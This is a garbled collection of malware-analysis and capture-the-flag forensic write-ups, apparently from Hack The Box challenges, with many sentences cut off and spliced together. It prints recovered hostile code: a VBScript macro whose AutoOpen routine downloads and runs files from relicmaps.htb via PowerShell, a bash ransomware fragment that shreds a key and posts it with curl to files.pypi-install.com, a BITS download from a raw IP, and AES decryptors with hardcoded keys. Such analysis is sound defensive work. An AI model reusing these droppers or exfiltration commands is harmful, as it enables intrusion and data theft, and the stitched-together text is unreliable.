\nstrings revealed an embedded script:Exec process using WMI\nFunction WmiExec(cmdLine )\n Dim objConfig\n Dim objProcess\n Set objWMIService = GetObject("winmgmts:\\\\.\\root\\cimv2")\n Set objStartup = objWMIService.Get("Win32_ProcessStartup")\n Set objConfig = objStartup.SpawnInstance_\n objConfig.ShowWindow = 0\n Set objProcess = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_Process")\n WmiExec = dukpatek(objProcess, objConfig, cmdLine)\nEnd Function\nPrivate Function dukpatek(myObjP , myObjC , myCmdL )\n Dim procId\n dukpatek = myObjP.Create(myCmdL, Null, myObjC, procId)\nEnd Function\nSub AutoOpen()\n ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri http://relicmaps.htb/uploads/soft/topsecret-maps.one -OutFile $env:tmp\\tsmap.one; Start-Process -Filepath $env:tmp\\tsmap.one"\n ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri http://relicmaps.htb/get/DdAbds/window.bat -OutFile $env:tmp\\system32.bat; Start-Process -Filepath $env:tmp\\system32.bat"\nEnd Sub\n' Exec process using WScript.Shell (asynchronous)\nSub WscriptExec(cmdLine )\n CreateObject("WScript.Shell").Run cmdLine, 0\nEnd Sub\nSub ExecuteCmdAsync(targetPath )\n On Error Resume Next\n Err.Clear\n wimResult = WmiExec(targetPath)\n If Err.Number <> 0 Or wimResult <> 0 Then\n Err.Clear\n WscriptExec targetPath\n End If\n On Error Goto 0\nEnd Sub\nwindow.resizeTo 0,0\nAutoOpenS\nCloseAutoOpen, we can see it downloads and executes a file called window.bat.$VuGcO to retrieve a Base64 string, then calls System.Convert.FromBase64String to decode it into binary data $uZOcm.System.Security.Cryptography classes to derive a Key and IV from hardcoded strings, creating a symmetric decryption object $Nlgap.$uZOcm.System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress), it is stored in the memory stream $bTMLk.$bTMLk is converted to an array, loaded as a System.Reflection.Assembly object, and executed.System.Reflection.Assembly object, but our approach was not elegant — we forced the data out of a process dump rather than finding a clean solution.System.Reflection.Assembly, but rather to replace the above reversed implementation with a Python script and export it as a file:key = base64.b64decode('0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=')\niv = base64.b64decode('2hn/J717js1MwdbbqMn7Lw==')\ncipher = AES.new(key, AES.MODE_CBC, iv=iv)\nclean = cipher.decrypt(base64.b64decode(inp))\nout = unpad(clean, 16)\ndecomp = gzip.decompress(out)Bashic Ransomware (Forensic)
\n\n
\ntljyVe4o7K3yOdj=\"<key>\"\necho $tljyVe4o7K3yOdj | base64 --decode | gpg --import\necho -e \"5\\ny\\n\" | gpg --command-fd 0 --edit-key \"RansomKey\" trust\n\nDhQ52B6UugM1WcX=`strings /dev/urandom | grep -o '[[:alnum:]]' | head -n 16 | tr -d '\\n'`\necho $DhQ52B6UugM1WcX > RxgXlDqP0h3baha\ngpg --batch --yes -r \"RansomKey\" -o qgffrqdGlfhrdoE -e RxgXlDqP0h3baha \nshred -u RxgXlDqP0h3baha\ncurl --request POST --data-binary \"@qgffrqdGlfhrdoE\" https://files.pypi-install.com/packages/recv.php\n\n# echo $DhQ52B6UugM1WcX | gpg --batch --yes -o \"$i\".a59ap --passphrase-fd 0 --symmetric --cipher-algo AES256 \"$i\" 2>/dev/null\ngpg --decrypt --batch --output data.txt flag.txt.a59aptmp7102591.exe was downloaded via Start-BitsTransfer from the following source:94974f08-5853-41ab-938a-ae1bd86d8e51, extracted that object from the pcap, and saved it as tmp7102591.exe.Start-BitsTransfer -Source http://64.226.84.200/94974f08-5853-41ab-938a-ae1bd86d8e51 -Destination C:\\Users\\TADPOL~1\\AppData\\Local\\Temp\\94974f08-5853-41ab-938a-ae1bd86d8e51tmp7102591.exe was a .NET application.using System;\nusing System.Diagnostics;\nusing System.Globalization;\nusing System.Security.Principal;\nusing System.Text.RegularExpressions;\nusing System.Security.Cryptography;\nusing System.Text;\n\nnamespace testapp\n{\n class Program\n {\nprivate static SymmetricAlgorithm CreateCam(string key, string IV, bool rij = true)\n{\nSymmetricAlgorithm symmetricAlgorithm = null;\nsymmetricAlgorithm = ((!rij) ? ((SymmetricAlgorithm)new AesCryptoServiceProvider()) : ((SymmetricAlgorithm)new RijndaelManaged()));\nsymmetricAlgorithm.Mode = CipherMode.CBC;\nsymmetricAlgorithm.Padding = PaddingMode.Zeros;\nsymmetricAlgorithm.BlockSize = 128;\nsymmetricAlgorithm.KeySize = 256;\nif (IV != null)\n{\nsymmetricAlgorithm.IV = Convert.FromBase64String(IV);\n}\nelse\n{\nsymmetricAlgorithm.GenerateIV();\n}\nif (key != null)\n{\nsymmetricAlgorithm.Key = Convert.FromBase64String(key);\n}\nreturn symmetricAlgorithm;\n}\n\nprivate static string Decryption(string key, string enc)\n{\nbyte[] array = Convert.FromBase64String(enc);\nbyte[] array2 = new byte[16];\nArray.Copy(array, array2, 16);\ntry\n{\nSymmetricAlgorithm symmetricAlgorithm = CreateCam(key, Convert.ToBase64String(array2));\nbyte[] bytes = symmetricAlgorithm.CreateDecryptor().TransformFinalBlock(array, 16, array.Length - 16);\nreturn Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(bytes).Trim(default(char))));\n}\ncatch\n{\nSymmetricAlgorithm symmetricAlgorithm2 = CreateCam(key, Convert.ToBase64String(array2), rij: false);\nbyte[] bytes2 = symmetricAlgorithm2.CreateDecryptor().TransformFinalBlock(array, 16, array.Length - 16);\nreturn Encoding.UTF8.GetString(Convert.FromBase64String(Encoding.UTF8.GetString(bytes2).Trim(default(char))));\n}\nfinally\n{\nArray.Clear(array, 0, array.Length);\nArray.Clear(array2, 0, 16);\n}\n}\n\nstatic void Main(string[] args)\n {\n string key = "DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=";\nstring enc = "</Kettie/Emmie/Anni?Theda=Merrilee? から取得>";\nstring text2 = Decryption(key, enc);\nConsole.WriteLine(text2);\n\n}\n }\n}Summary
\n